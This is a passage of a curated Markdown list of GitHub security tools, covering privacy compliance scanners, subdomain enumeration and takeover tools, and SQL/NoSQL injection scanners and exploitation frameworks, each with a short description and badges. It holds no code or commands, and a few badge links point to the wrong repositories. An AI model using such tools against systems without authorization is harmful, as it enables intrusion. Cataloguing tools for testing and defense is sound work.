integration. Performs value and taint analysis**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/airbus-seclab/bincat?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/airbus-seclab/bincat?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/airbus-seclab/bincat?style=flat-square) ![GitHub](https://img.shields.io/github/license/airbus-seclab/bincat?style=flat-square)\n\n\n### Privacy Compliance\n\n- https://github.com/riskscanner/riskscanner - **Multi-cloud privacy compliance scanning platform, through Cloud Custodian's YAML DSL to define scanning rules**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/riskscanner/riskscanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/riskscanner/riskscanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/riskscanner/riskscanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/riskscanner/riskscanner?style=flat-square)\n\n- https://github.com/momosecurity/bombus - **Enterprise security and privacy compliance platform**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/momosecurity/bombus?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/momosecurity/bombus?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/momosecurity/bombus?style=flat-square) ![GitHub](https://img.shields.io/github/license/momosecurity/bombus?style=flat-square)\n\n### Subdomain Enumeration or Takeover\n\n- https://github.com/lijiejie/subDomainsBrute - **A classical subdomain enumeration Tool by lijiejie**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lijiejie/subDomainsBrute?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lijiejie/subDomainsBrute?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lijiejie/subDomainsBrute?style=flat-square) ![GitHub](https://img.shields.io/github/license/lijiejie/subDomainsBrute?style=flat-square)\n\n- https://github.com/ring04h/wydomain - **A Speed and Precision subdomain enumeration Tool by ringzero**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ring04h/wydomain?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ring04h/wydomain?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ring04h/wydomain?style=flat-square) ![GitHub](https://img.shields.io/github/license/ring04h/wydomain?style=flat-square)\n\n- https://github.com/le4f/dnsmaper - **Subdomain enumeration tool with map record**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/le4f/dnsmaper?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/le4f/dnsmaper?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/le4f/dnsmaper?style=flat-square) ![GitHub](https://img.shields.io/github/license/le4f/dnsmaper?style=flat-square)\n\n- https://github.com/TheRook/subbrute - **A DNS meta-query spider that enumerates DNS records, and subdomains,supported API**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/TheRook/subbrute?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/TheRook/subbrute?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/TheRook/subbrute?style=flat-square) ![GitHub](https://img.shields.io/github/license/TheRook/subbrute?style=flat-square)\n\n- https://github.com/We5ter/GSDF - **Subdomain enumeration via Google certificate transparency**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/We5ter/GSDF?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/We5ter/GSDF?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/We5ter/GSDF?style=flat-square) ![GitHub](https://img.shields.io/github/license/We5ter/GSDF?style=flat-square)\n\n- https://github.com/mandatoryprogrammer/cloudflare_enum - **Subdomain enumeration via CloudFlare**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/mandatoryprogrammer/cloudflare_enum?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/mandatoryprogrammer/cloudflare_enum?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/mandatoryprogrammer/cloudflare_enum?style=flat-square) ![GitHub](https://img.shields.io/github/license/mandatoryprogrammer/cloudflare_enum?style=flat-square)\n\n- https://github.com/guelfoweb/knock - **Knock subdomain scan**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/guelfoweb/knock?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/guelfoweb/knock?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/guelfoweb/knock?style=flat-square) ![GitHub](https://img.shields.io/github/license/guelfoweb/knock?style=flat-square)\n\n- https://github.com/exp-db/PythonPool/tree/master/Tools/DomainSeeker - **An intergratd Python subdomain enumeration tool**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/exp-db/PythonPool?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/exp-db/PythonPool?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/exp-db/PythonPool?style=flat-square) ![GitHub](https://img.shields.io/github/license/exp-db/PythonPool?style=flat-square)\n\n- https://github.com/code-scan/BroDomain - **Find brother domain**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/code-scan/BroDomain?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/code-scan/BroDomain?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/code-scan/BroDomain?style=flat-square) ![GitHub](https://img.shields.io/github/license/code-scan/BroDomain?style=flat-square)\n\n- https://github.com/chuhades/dnsbrute - **A fast domain brute tool**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/chuhades/dnsbrute?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/chuhades/dnsbrute?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/chuhades/dnsbrute?style=flat-square) ![GitHub](https://img.shields.io/github/license/chuhades/dnsbrute?style=flat-square)\n\n- https://github.com/yanxiu0614/subdomain3 - **A simple and fast tool for bruting subdomains**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/yanxiu0614/subdomain3?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/yanxiu0614/subdomain3?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/yanxiu0614/subdomain3?style=flat-square) ![GitHub](https://img.shields.io/github/license/yanxiu0614/subdomain3?style=flat-square)\n\n- https://github.com/michenriksen/aquatone - **A powerful subdomain tool and domain takeovers finding tools**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/michenriksen/aquatone?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/michenriksen/aquatone?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/michenriksen/aquatone?style=flat-square) ![GitHub](https://img.shields.io/github/license/michenriksen/aquatone?style=flat-square)\n\n- https://github.com/evilsocket/dnssearch - **A subdomain enumeration tool**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/evilsocket/dnssearch?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/evilsocket/dnssearch?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/evilsocket/dnssearch?style=flat-square) ![GitHub](https://img.shields.io/github/license/evilsocket/dnssearch?style=flat-square)\n\n- https://github.com/reconned/domained - **Subdomain enumeration tools for bug hunting**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/reconned/domained?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/reconned/domained?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/reconned/domained?style=flat-square) ![GitHub](https://img.shields.io/github/license/reconned/domained?style=flat-square)\n\n- https://github.com/bit4woo/Teemo - **A domain name & Email address collection tool**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/bit4woo/Teemo?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/bit4woo/Teemo?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/bit4woo/Teemo?style=flat-square) ![GitHub](https://img.shields.io/github/license/bit4woo/Teemo?style=flat-square)\n\n- https://github.com/laramies/theHarvester - **E-mail, subdomain and people names harvester**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/laramies/theHarvester?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/laramies/theHarvester?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/laramies/theHarvester?style=flat-square) ![GitHub](https://img.shields.io/github/license/laramies/theHarvester?style=flat-square)\n\n- https://github.com/nmalcolm/Inventus - **A spider designed to find subdomains of a specific domain by crawling it**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/nmalcolm/Inventus?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/nmalcolm/Inventus?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/nmalcolm/Inventus?style=flat-square) ![GitHub](https://img.shields.io/github/license/nmalcolm/Inventus?style=flat-square)\n\n- https://github.com/aboul3la/Sublist3r - **Fast subdomains enumeration tool for penetration testers**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/aboul3la/Sublist3r?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/aboul3la/Sublist3r?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/aboul3la/Sublist3r?style=flat-square) ![GitHub](https://img.shields.io/github/license/aboul3la/Sublist3r?style=flat-square)\n\n- https://github.com/jonluca/Anubis - **Subdomain enumeration and information gathering tool**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/jonluca/Anubis?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/jonluca/Anubis?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/jonluca/Anubis?style=flat-square) ![GitHub](https://img.shields.io/github/license/jonluca/Anubis?style=flat-square)\n\n- https://github.com/n4xh4ck5/N4xD0rk - **Listing subdomains about a main domain**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/n4xh4ck5/N4xD0rk?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/n4xh4ck5/N4xD0rk?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/n4xh4ck5/N4xD0rk?style=flat-square) ![GitHub](https://img.shields.io/github/license/n4xh4ck5/N4xD0rk?style=flat-square)\n\n- https://github.com/infosec-au/altdns - **Subdomain discovery through alterations and permutations**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/infosec-au/altdns?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/infosec-au/altdns?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/infosec-au/altdns?style=flat-square) ![GitHub](https://img.shields.io/github/license/infosec-au/altdns?style=flat-square)\n\n- https://github.com/FeeiCN/ESD - **Enumeration sub domains tool,based on AsyncIO and non-repeating dict**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/FeeiCN/ESD?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/FeeiCN/ESD?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/FeeiCN/ESD?style=flat-square) ![GitHub](https://img.shields.io/github/license/FeeiCN/ESD?style=flat-square)\n\n- https://github.com/UnaPibaGeek/ctfr - **Abusing certificate transparency logs for getting HTTPS websites subdomains**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/UnaPibaGeek/ctfr?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/UnaPibaGeek/ctfr?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/UnaPibaGeek/ctfr?style=flat-square) ![GitHub](https://img.shields.io/github/license/UnaPibaGeek/ctfr?style=flat-square)\n\n- https://github.com/giovanifss/Dumb - **Dumain Bruteforcer, a fast and flexible domain bruteforcer**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Haskell-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/giovanifss/Dumb?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/giovanifss/Dumb?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/giovanifss/Dumb?style=flat-square) ![GitHub](https://img.shields.io/github/license/giovanifss/Dumb?style=flat-square)\n\n- https://github.com/OWASP/Amass - **In-depth Attack Surface Mapping and Asset Discovery**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/OWASP/Amass?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/OWASP/Amass?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/OWASP/Amass?style=flat-square) ![GitHub](https://img.shields.io/github/license/OWASP/Amass?style=flat-square)\n\n- https://github.com/Ice3man543/subfinder - **A subdomain discovery tool which has a simple modular architecture and has been aimed as a successor to sublist3r project**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Ice3man543/subfinder?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Ice3man543/subfinder?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Ice3man543/subfinder?style=flat-square) ![GitHub](https://img.shields.io/github/license/Ice3man543/subfinder?style=flat-square)\n\n- https://github.com/Ice3man543/SubOver - **A powerful subdomain takeover tool**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Ice3man543/SubOver?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Ice3man543/SubOver?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Ice3man543/SubOver?style=flat-square) ![GitHub](https://img.shields.io/github/license/Ice3man543/SubOver?style=flat-square)\n\n- https://github.com/janniskirschner/horn3t - **Powerful Visual Subdomain Enumeration**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/janniskirschner/horn3t?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/janniskirschner/horn3t?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/janniskirschner/horn3t?style=flat-square) ![GitHub](https://img.shields.io/github/license/janniskirschner/horn3t?style=flat-square)\n\n- https://github.com/yunxu1/dnsub - **A high concurrency and cross platform subdomain scanner based on Golang**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/yunxu1/dnsub?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/yunxu1/dnsub?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/yunxu1/dnsub?style=flat-square) ![GitHub](https://img.shields.io/github/license/yunxu1/dnsub?style=flat-square)\n\n- https://github.com/shmilylty/OneForAll - **An ultimate subdomains scanner integrated multiple subdomain scanning tools**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/shmilylty/OneForAll?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/shmilylty/OneForAll?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/shmilylty/OneForAll?style=flat-square) ![GitHub](https://img.shields.io/github/license/shmilylty/OneForAll?style=flat-square)\n\n- https://github.com/knownsec/ksubdomain - **A stateless and cross-platform subdomain enumeration tool, speed up to 30w/s on Mac and Windows, and 160w/s on Linux**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/knownsec/ksubdomain?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/knownsec/ksubdomain?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/knownsec/ksubdomain?style=flat-square) ![GitHub](https://img.shields.io/github/license/knownsec/ksubdomain?style=flat-square)\n\n- https://github.com/gwen001/github-subdomains - **Find subdomains on GitHub**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/gwen001/github-subdomains?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/gwen001/github-subdomains?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/gwen001/github-subdomains?style=flat-square) ![GitHub](https://img.shields.io/github/license/gwen001/github-subdomains?style=flat-square)\n\n- https://github.com/bit4woo/domain_hunter_pro - **Domain finder and Targets management, automated information collection, integrated with burpsuite**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/bit4woo/domain_hunter_pro?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/bit4woo/domain_hunter_pro?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/bit4woo/domain_hunter_pro?style=flat-square) ![GitHub](https://img.shields.io/github/license/bit4woo/domain_hunter_pro?style=flat-square)\n\n- https://github.com/m4ll0k/takeover - **Sub-Domain TakeOver Vulnerability Scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/m4ll0k/takeover?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/m4ll0k/takeover?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/m4ll0k/takeover?style=flat-square) ![GitHub](https://img.shields.io/github/license/m4ll0k/takeover?style=flat-square)\n\n- https://github.com/v4d1/Dome - **Active and/or passive scan to obtain subdomains and search for open port**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/v4d1/Dome?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/v4d1/Dome?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/v4d1/Dome?style=flat-square) ![GitHub](https://img.shields.io/github/license/v4d1/Dome?style=flat-square)\n\n- https://github.com/cramppet/regulator - **Automated subdomain enumeration tool by learning of regexes for DNS discovery**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/cramppet/regulator?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/cramppet/regulator?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/cramppet/regulator?style=flat-square) ![GitHub](https://img.shields.io/github/license/cramppet/regulator?style=flat-square)\n\n- https://github.com/D3Ext/AORT - **All in One Recon Tool for domains**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/D3Ext/AORT?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/D3Ext/AORT?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/D3Ext/AORT?style=flat-square) ![GitHub](https://img.shields.io/github/license/D3Ext/AORT?style=flat-square)\n\n\n### Database SQL Injection Vulnerability or Brute Force\n\n- https://github.com/0xbug/SQLiScanner - **A SQLi vulnerability scanner via SQLMAP and Charles**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/0xbug/SQLiScanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/0xbug/SQLiScanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/0xbug/SQLiScanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/0xbug/SQLiScanner?style=flat-square)\n\n- https://github.com/stamparm/DSSS - **A SQLi vulnerability scanner with 99 lines of code**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/stamparm/DSSS?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/stamparm/DSSS?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/stamparm/DSSS?style=flat-square) ![GitHub](https://img.shields.io/github/license/stamparm/DSSS?style=flat-square)\n\n- https://github.com/youngyangyang04/NoSQLAttack - **A SQLi vulnerability scanner for mongoDB**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/stamparm/DSSS?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/youngyangyang04/NoSQLAttack?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/youngyangyang04/NoSQLAttack?style=flat-square) ![GitHub](https://img.shields.io/github/license/youngyangyang04/NoSQLAttack?style=flat-square)\n\n- https://github.com/Neohapsis/bbqsql - **A blind SQLi vulnerability scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Neohapsis/bbqsql?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Neohapsis/bbqsql?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Neohapsis/bbqsql?style=flat-square) ![GitHub](https://img.shields.io/github/license/Neohapsis/bbqsql?style=flat-square)\n\n- https://github.com/NetSPI/PowerUpSQL - **A SQLi vulnerability scanner with Powershell script**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PowerShell-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/NetSPI/PowerUpSQL?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/NetSPI/PowerUpSQL?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/NetSPI/PowerUpSQL?style=flat-square) ![GitHub](https://img.shields.io/github/license/NetSPI/PowerUpSQL?style=flat-square)\n\n- https://github.com/WhitewidowScanner/whitewidow - **Another SQL vulnerability scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Ruby-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/WhitewidowScanner/whitewidow?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/WhitewidowScanner/whitewidow?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/WhitewidowScanner/whitewidow?style=flat-square) ![GitHub](https://img.shields.io/github/license/WhitewidowScanner/whitewidow?style=flat-square)\n\n- https://github.com/stampery/mongoaudit - **A powerful MongoDB auditing and pentesting tool**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/stampery/mongoaudit?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/stampery/mongoaudit?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/stampery/mongoaudit?style=flat-square) ![GitHub](https://img.shields.io/github/license/stampery/mongoaudit?style=flat-square)\n\n- https://github.com/torque59/Nosql-Exploitation-Framework - **A Python framework For NoSQL scanning and exploitation**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/stampery/mongoaudit?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/stampery/mongoaudit?style=flat-square) ![GitHub 